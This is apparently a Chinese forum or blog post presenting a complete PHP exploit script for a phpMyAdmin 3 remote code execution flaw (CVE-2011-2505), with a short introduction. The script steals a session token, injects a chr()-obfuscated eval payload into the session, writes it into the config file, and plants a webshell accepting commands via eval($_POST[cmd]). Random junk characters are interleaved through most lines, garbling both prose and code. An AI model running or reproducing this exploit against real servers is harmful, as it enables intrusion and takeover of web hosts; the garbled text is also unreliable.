最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
6 X' a* M0 `8 E, M0 @; b
1 l, t& B0 ^: k% H! p0 U( w昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。* g9 @0 ^0 P" K( W+ P% B. l# ~
1 y/ q& L/ t( A/ z
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
9 E. A# o! I0 f% @& E% i+ b一是session.auto_start = 1;
& M U2 S" q$ W7 e* @$ O. t' ~二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
. n2 Y9 _! G( | X当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
4 ?- V+ t2 |( n F1 z1 A |0 I4 g! f5 B; \
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
# ]/ x/ r2 P1 ?+ c" b( ?% i- f& g' d/ m
于是写了这个php版本的exp,代码如下:
5 T/ @6 c- g: d% O# T% O' f$ U) g. a, O7 t$ ?& U
#!/usr/bin/php
# Z% E5 z) v" n4 d<?php$ I$ _3 Y Q8 \% I% s. `3 E# r
print_r('
' }9 n; ~8 q% \2 f3 Q) j8 Z8 R+---------------------------------------------------------------------------+
: S2 J9 v3 J) Hpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
3 [# a: j' X! _by oldjun(www.oldjun.com)% [* l3 W+ q) V8 V. k. L4 _
welcome to www.t00ls.net
, _* V7 l0 i T" g; Gmail: oldjun@gmail.com: D$ g% o! W0 q, e$ v
Assigned CVE id: CVE-2011-2505
9 v% u) K& b* P: a& y4 J4 L" v+---------------------------------------------------------------------------+. u# S$ u# U9 a) ^3 X; l7 y
');
8 J1 t+ ]" v$ h$ T9 j% s( a ]3 U+ Y0 ~: X
/**
4 q2 v, H8 L1 Q * working when the directory:"config" exists and is writeable., e) W, [# X0 h1 p' u, o
**/5 m$ K$ D: e, E7 R6 F
0 a# z: J0 R( W- B* B( N$ q, M
if ($argc < 3) {
: I7 Y& n0 z$ L2 J: Y! U print_r('
9 A1 G* a% [8 C7 c' }/ X# E+---------------------------------------------------------------------------+# p8 v) N( q( i7 ?
Usage: php '.$argv[0].' host path
3 Q8 j- `5 r, }" bhost: target server (ip/hostname)
2 h# B$ y$ f" \9 W# E0 b- c. hpath: path to pma39 s* g+ Q" x8 Z: c; l; E
Example:4 {( g" [. C% Z+ u: y l1 N
php '.$argv[0].' localhost /pma/, w) H0 n2 u( U v( r
+---------------------------------------------------------------------------+3 `1 T( e) W# q" P
');
2 @& y% r; E# |! W. n exit;
8 ~) `/ J. @1 w. l% N' U0 |}1 k6 e; Z( q/ u: I8 D
: F M# a3 ^1 P( R$host = $argv[1];% Y W; p) L: s: S* V' B5 X
$path = $argv[2];
# o" P' [" T8 D# r9 E- |. V ]7 ?, E! P# ]+ L
/**( @: @3 T5 y( f9 _, x" X
* Try to determine if the directory:"config" exists
5 Y1 G# M# Q9 h' u6 n**/
6 `1 ~3 M) u5 lecho "[+] Try to determine if the directory:config exists....\n";
- T, x5 X; w1 ]. O: b6 [$returnstr=php_request('config/');
* S5 i3 Z8 ^ k: `; @/ bif(strpos($returnstr,'404')){
P1 T8 @( `7 L# C exit("[-] Exploit Failed! The directory:config do not exists!\n");3 _2 G* B$ z! K8 S
}
. S( H1 ]4 S7 s$ k# o8 f/ n- u1 d- O# k4 R' f( A9 z. U
/**8 l$ s0 V# e" Q
* Try to get token and sessionid. ~6 `# f/ ?/ s& a
**/
4 O2 s) v$ J! R3 Y+ O; Secho "[+] Try to get token and sessionid....\n";
}1 a, a! H' m% {; \+ {$result=php_request('index.php');% a9 _% A) J0 I
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);/ R% D/ }; {$ D; h" J. b, B
$token=$resp[3];
4 h0 o. g1 X/ \7 a* }$sessionid=$resp[1];7 O0 w2 f# ?/ e9 p
if($token && $sessionid){/ m* k' |+ G. P( y
echo "[+] token token\n";% p1 f( ]( g. D: h- d
echo "[+] Session ID sessionid\n";$ n* E8 S: o& A* d$ b0 f1 o$ j$ k* e
}else{
! w/ J* T; P. J: ? exit("[-] Can't get token and Session ID,Exploit Failed!\n");! w$ M, K" o+ r9 _4 S; F
}
$ x( l+ d- p1 w, f D9 S% {) C: o1 R6 g$ J: W* B
/**
# s9 m$ e! C1 H Y2 G6 n$ N * Try to insert shell into session( [; v6 V# J) |' Q
**/6 _' I9 H0 Q* f+ A
echo "[+] Try to insert shell into session....\n";1 I2 r, a. Z. ]1 e" I3 S; R7 M) Y
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
4 d6 G; u& k( v8 P+ R, s) V4 ]; C% K: b, |
/**5 e9 N: {0 A+ U3 ~. O
* Try to create webshell
( e2 \ L, W2 A8 v# d**/! N V+ O0 V- o0 I5 R1 L U! K
echo "[+] Try to create webshell....\n";9 L2 C; I7 ^1 |5 Z1 ^9 j( j0 X' x
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);' N% x2 D) P* W; ^: b T7 `
/**' S a4 c8 l9 U! r7 M# F" F& ?
* Try to check if the webshell was created successfully. _6 K- |% u2 i) s) V# N% _. }/ }
**/: B# U/ [$ ^/ A9 d: X& }$ V/ G
echo "[+] Try to check if the webshell was created successfully....\n";
6 Z# i* M# X/ B8 ]8 [' {$content=php_request('config/config.inc.php');) Z- n) c" B) j$ p1 D
if(strpos($content,'t00ls')){
( V c' e1 t/ _" T/ S' t8 {: _% p echo "[+] Congratulations! Expoilt successfully....\n";7 S; \, X" P2 c0 X/ D/ c) ? r5 R
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
6 P6 u; N5 W" o9 o8 T' V. I; l}else{
% g+ u0 D" F4 {) k; J! [, X. p exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
% j# _2 o6 o5 ]/ G0 Y+ L8 N}' d3 `$ x* ?, ~1 R- l8 W
7 y' l0 e! ~' A( ^9 r7 x8 nfunction php_request($url,$data='',$cookie=''){
3 F2 c& \- t3 ~- L' t5 V global $host, $path;
0 O; f5 ]6 F- L* R: p
6 U c6 n) [" X% | $method=$data?'POST':'GET';; F4 A& o5 }5 [2 Z5 W" e
5 n: q8 B# y" `, T
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
& O$ v8 X. s) F: ` $packet .= "Accept: */*\r\n";4 V) }. w' S7 j( Q
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
+ w0 j5 N; T$ ~9 r/ o $packet .= "Host: $host\r\n";& W7 ~/ V, r$ O7 J; w3 j6 |7 j5 b1 J
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";$ @, L9 h ~% [
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";( @& ~4 _# M g+ L4 z
$packet .= $cookie?"Cookie: $cookie\r\n":"";: U; I% Y& {/ h8 V" b P$ {
$packet .= "Connection: Close\r\n\r\n";- y, f. T, T+ x" T: A# t6 k) `
$packet .= $data?$data:"";# ~! E$ A7 N2 G) z5 L/ a6 z
% u$ i) N# f) f0 g
$fp = fsockopen(gethostbyname($host), 80);
2 u- ]; _7 ]: z7 K/ @ W if (!$fp) {
: ?2 Y0 ]* c; ~5 O' f- d4 ]! | echo 'No response from '.$host; die;+ h* f5 u9 i- ^! I* v% ]
}
7 K& |& F* p2 a$ t2 @* J6 I- g fputs($fp, $packet);/ e, P3 w4 Q0 F4 r+ X7 R
: ? @+ m! c- J $resp = '';
( z$ c( E8 N, S% P; ~$ S
. V5 E4 t5 H4 s! _% K$ j while ($fp && !feof($fp))7 {! u2 L3 i y1 x* p
$resp .= fread($fp, 1024);* C( g- r" j& w5 K$ E' }6 K' G
8 Y+ L" v9 K) }, c return $resp;" [* m5 Q4 E* `
}
: N3 @3 s! o5 Y* W" ~8 A* r0 a
) C2 F# Z s/ x; ^+ x5 t?>
! ]1 ?2 O3 J4 B2 e& k' H5 R. |